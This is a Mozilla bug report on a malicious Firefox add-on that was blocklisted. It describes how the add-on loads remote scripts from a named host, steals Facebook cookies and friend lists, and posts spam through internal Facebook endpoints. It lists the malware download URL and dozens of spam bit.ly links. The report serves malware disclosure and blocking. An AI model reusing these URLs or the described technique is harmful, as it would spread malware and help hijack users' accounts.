Last Comment Bug 724691 - Malicious "Firefox Essentials" add-on
: Malicious "Firefox Essentials" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-02-06 14:39 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120206 youtube3.zip (80.69 KB, application/octet-stream)
2012-02-06 14:39 PST, MarkH
no flags Details

Description MarkH 2012-02-06 14:39:52 PST
Created attachment 594822 [details]
20120206 youtube3.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded add-on from http://lacolom[.]be/fbs.xpi


Actual results:

The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.

oepp.php:

Steals your cookies
Steals you friend list via /ajax/typeahead/first_degree.php

Picks one of the following bit.ly URLs:

http://bit.ly/A54fuM
http://bit.ly/A5BioE
http://bit.ly/A61qQj
http://bit.ly/AkDIFP
http://bit.ly/AqZ0Om
http://bit.ly/wAANlt
http://bit.ly/wPYUpe
http://bit.ly/wfRFEa
http://bit.ly/wjuuaZ
http://bit.ly/x4ig0a
http://bit.ly/x7cnJj
http://bit.ly/x90Fc6
http://bit.ly/xCjMIo
http://bit.ly/xKMbLH
http://bit.ly/xL31ch
http://bit.ly/xf7vnN
http://bit.ly/xuWFKm
http://bit.ly/y4eAYc
http://bit.ly/yDGIoi
http://bit.ly/yFZ9eM
http://bit.ly/yQbCxV
http://bit.ly/yoVZbq
http://bit.ly/ytvSEJ
http://bit.ly/z48I3i
http://bit.ly/zEB37d
http://bit.ly/zOo8me
http://bit.ly/zkg07u

Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.

Picks one of he following bit.ly URLs:
http://bit.ly/A4uCl8
http://bit.ly/A5ixGO
http://bit.ly/AESbVg
http://bit.ly/AhONYc
http://bit.ly/AiCvpH
http://bit.ly/wJDMu7
http://bit.ly/wNcTf6
http://bit.ly/wRokAK
http://bit.ly/wYaljt
http://bit.ly/wfRFEa
http://bit.ly/wjrfV3
http://bit.ly/wk4NBy
http://bit.ly/wmEBss
http://bit.ly/wum0Ui
http://bit.ly/wvjyrp
http://bit.ly/x6ERiI
http://bit.ly/xPfRQs
http://bit.ly/xj3Fsb
http://bit.ly/xzpzvJ
http://bit.ly/y1BfN5
http://bit.ly/y7zJKt
http://bit.ly/yQe6r7
http://bit.ly/yc8K1n
http://bit.ly/ycQxii
http://bit.ly/ylhBqc
http://bit.ly/zt6Wgw
http://bit.ly/zw7uy2

Posts it as an update to your timeline via /ajax/ufi/modify.php

Picks one of the following FB pages:
221128464647487
227499167340992
232493100172345
266988576702848
296308197093558
316095231773903
318315724872330
330406740337729
336886886352146
362134143796905

and has you post about it via /ajax/ufi/modify.php.



Expected results:

It shouldn't steal your cookies and post to Facebook on your behalf without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-02-06 15:36:41 PST
ID: youtube@youtuber.com
Comment 2 Jorge Villalobos [:jorgev] 2012-02-06 15:40:17 PST
https://addons.mozilla.org/en-US/firefox/blocked/i63

Note You need to log in before you can comment on or make changes to this bug.